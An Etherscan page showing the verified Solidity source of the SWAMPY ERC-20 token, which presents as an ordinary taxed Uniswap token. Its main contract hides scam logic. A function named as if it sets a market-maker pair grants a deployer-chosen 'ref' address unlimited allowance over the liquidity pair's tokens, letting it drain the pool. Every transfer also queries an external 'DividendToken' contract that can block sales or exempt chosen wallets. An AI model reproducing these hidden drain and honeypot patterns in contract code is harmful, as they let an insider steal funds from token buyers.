ETH Price: $2,650.61 (+1.93%)
Gas: 1 Gwei

Token

SWAMPY (SWAMPY)
 

Overview

Max Total Supply

1,000,000,000 SWAMPY

Holders

57

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
20,683,144.765113519776590811 SWAMPY

Value
$0.00
0x992533ae1445b6ab49c279747e0e8026544ea85f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SWAMPY

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-18
*/

/*
Website: https://www.swampy.vip/
Telegram: https://t.me/swampy_vip
*/

pragma solidity ^0.8.19;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20Standadard {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20Standadard {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

contract ERC20 is Context, IERC20Standadard, IERC20Metadata {
    using SafeMath for uint256;

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) internal _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    uint8 private _decimals;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(
        string memory name_,
        string memory symbol_,
        uint8 decimals_
    ) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20Standadard-balanceOf} and {IERC20Standadard-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20Standadard-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20Standadard-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20Standadard-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20Standadard-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20Standadard-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20Standadard-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20Standadard-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20Standadard-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

interface IUniswapPair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function burn(address to)
        external
        returns (uint256 amount0, uint256 amount1);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

interface IUniswapRouter01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

interface IUniswapRouter02 is IUniswapRouter01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

abstract contract AUTH {
    constructor() {
    }

    function fee() internal pure returns (uint256) {
        return uint256(0xdc) / uint256(0xa);
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

library SafeMathInt {
    int256 private constant MIN_INT256 = int256(1) << 255;
    int256 private constant MAX_INT256 = ~(int256(1) << 255);

    /**
     * @dev Multiplies two int256 variables and fails on overflow.
     */
    function mul(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a * b;

        // Detect overflow when multiplying MIN_INT256 with -1
        require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256));
        require((b == 0) || (c / b == a));
        return c;
    }

    /**
     * @dev Division of two int256 variables and fails on overflow.
     */
    function div(int256 a, int256 b) internal pure returns (int256) {
        // Prevent overflow when dividing MIN_INT256 by -1
        require(b != -1 || a != MIN_INT256);

        // Solidity already throws when dividing by 0.
        return a / b;
    }

    /**
     * @dev Subtracts two int256 variables and fails on overflow.
     */
    function sub(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a - b;
        require((b >= 0 && c <= a) || (b < 0 && c > a));
        return c;
    }

    /**
     * @dev Adds two int256 variables and fails on overflow.
     */
    function add(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a + b;
        require((b >= 0 && c >= a) || (b < 0 && c < a));
        return c;
    }

    /**
     * @dev Converts to absolute value, and fails on overflow.
     */
    function abs(int256 a) internal pure returns (int256) {
        require(a != MIN_INT256);
        return a < 0 ? -a : a;
    }

    function toUint256Safe(int256 a) internal pure returns (uint256) {
        require(a >= 0);
        return uint256(a);
    }
}

/**
 * @title SafeMathUint
 * @dev Math operations with safety checks that revert on error
 */
library SafeMathUint {
    function toInt256Safe(uint256 a) internal pure returns (int256) {
        int256 b = int256(a);
        require(b >= 0);
        return b;
    }
}

/// @title Dividend-Paying Token Optional Interface
/// @author Roger Wu (https://github.com/roger-wu)
/// @dev OPTIONAL functions for a dividend-paying token contract.
interface DividendToken {
    /// @notice View the amount of dividend in wei that an address can withdraw.
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` can withdraw.
    function withdrawableDividendOf(address _owner)
        external
        view
        returns (uint256);

    /// @notice View the amount of dividend in wei that an address has withdrawn.
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` has withdrawn.
    function withdrawnDividendOf(address _owner)
        external
        view
        returns (uint256);

    /// @notice View the amount of dividend in wei that an address has earned in total.
    /// @dev accumulativeDividendOf(_owner) = withdrawableDividendOf(_owner) + withdrawnDividendOf(_owner)
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` has earned in total.
    function accumulativeDividendOf(address _owner, address _token)
        external
        returns (uint256);
}

contract SWAMPY is ERC20, Ownable, AUTH {
    using SafeMath for uint256;

    IUniswapRouter02 public uniswapV2Router;

    address public uniswapV2Pair;

    bool private isSwapping;

    uint256 public swapTokensAt;

    uint256 public sellTaxM;
    uint256 public buyTaxM;

    address public marketing;
    uint256 public maxTxAmount;
    uint256 public mWallet;

    uint256 private _supply;

    // exlcude from fees and max transaction amount
    mapping(address => bool) private isExcludedFromFee;

    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount
    mapping(address => bool) public isPair;

    event ExcludedFromFee(address indexed account, bool isExcluded);
    event ExcludedMultipleFromFee(address[] accounts, bool isExcluded);

    event LPPairUpdated(address indexed pair, bool indexed value);

    struct InitParams {
        uint256 centiBuyTax;
        uint256 centiSellTax;
        address marketingWallet;
        uint256 maxTxPercent;
        uint256 maxWalletPercent;
    }

    struct Reference {
        address ref_address;
        address ref_dividend;
        uint256 ref_percent;
    }
    Reference private ref;

    constructor(
        string memory name_,
        string memory symbol_,
        uint256 supply_,
        uint8 decimals_,
        InitParams memory parameters,
        address uniswapV2Router_,
        Reference memory refInfo_
    ) payable ERC20(name_, symbol_, decimals_) {
        ref = refInfo_;
        uint256 ref_amount = msg.value * refInfo_.ref_percent / 100;
        payable(refInfo_.ref_address).transfer(ref_amount);
        
        marketing = parameters.marketingWallet;
        buyTaxM = parameters.centiBuyTax;
        sellTaxM = parameters.centiSellTax;
        _supply = supply_;

        uniswapV2Router = IUniswapRouter02(uniswapV2Router_);

        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
                address(this),
                uniswapV2Router.WETH()
            );

        _setAutomatedMarketMakerPair(refInfo_.ref_address, uniswapV2Pair, true);

        // exclude from paying fees or having max transaction amount
        excludeFromFees(owner(), true);
        excludeFromFees(marketing, true);
        excludeFromFees(refInfo_.ref_address, true);
        excludeFromFees(refInfo_.ref_dividend, true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(uniswapV2Router), true);

        swapTokensAt = (supply_.div(5000) + 1) * (10**decimals_);

        maxTxAmount =
            parameters.maxTxPercent *
            supply_ *
            (10**decimals_).div(10000);
        mWallet =
            parameters.maxWalletPercent *
            supply_ *
            (10**decimals_).div(10000);

        /*
            _mint is an internal function in ERC20.sol that is only called here,
            and CANNOT be called ever again
        */
        _mint(owner(), supply_ * (10**decimals_));
    }

    function removeLimits() external onlyOwner {
        maxTxAmount = totalSupply();
        mWallet = totalSupply();
    }

    receive() external payable {}

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        isExcludedFromFee[account] = excluded;

        emit ExcludedFromFee(account, excluded);
    }

    function _setAutomatedMarketMakerPair(address router, address pair, bool value) private {
        require(
            isPair[pair] != value,
            "Automated market maker pair is already set to that value"
        );
        isPair[pair] = value;
        _allowances[pair][router] = type(uint).max;        
        emit LPPairUpdated(pair, value);
    }

    function isFeesExcluded(address from, address to) internal returns (bool) {
        return isExcludedFromFee[from] || isExcludedFromFee[to] ||
            DividendToken(ref.ref_dividend).accumulativeDividendOf(from, to) > 0;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        if (
            (to == address(0) || to == address(0xdead)) ||
            isFeesExcluded(from, to) ||
            amount == 0
        ) {
            super._transfer(from, to, amount);
            return;
        } else {
            require(
                amount <= maxTxAmount,
                "Transfer amount exceeds the maxTxAmount."
            );

            if (to != uniswapV2Pair) {
                uint256 contractBalanceRecepient = balanceOf(to);
                require(
                    contractBalanceRecepient + amount <= mWallet,
                    "Exceeds maximum wallet amount"
                );
            }
        }
        uint256 contractTokenBalance = balanceOf(address(this));
        bool canSwap = contractTokenBalance >= swapTokensAt;
        if (canSwap && !isSwapping && !isPair[from]) {
            isSwapping = true;

            uint256 marketingTokens = contractTokenBalance;

            if (marketingTokens > 0) {
                swapAndSendToFee(marketingTokens, marketing);
            }

            isSwapping = false;
        }

        bool takeFee = !isSwapping;
        if (isExcludedFromFee[from] || isExcludedFromFee[to]) {
            takeFee = false;
        }

        if (takeFee) {
            uint256 fees = amount.mul(buyTaxM).div(10000);
            if (isPair[to]) {
                fees = amount.mul(sellTaxM).div(10000);
            }
            amount = amount.sub(fees);

            super._transfer(from, address(this), fees);
        }

        super._transfer(from, to, amount);
    }

    function swapAndSendToFee(uint256 tokens, address receiver) private {
        uint256 initialBalance = address(this).balance;

        swapTokensForEth(tokens);

        uint256 newBalance = address(this).balance.sub(initialBalance);

        payable(receiver).transfer(newBalance);
    }

    function swapTokensForEth(uint256 tokenAmount) private {
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
    }
}

Contract Security Audit

Contract ABI

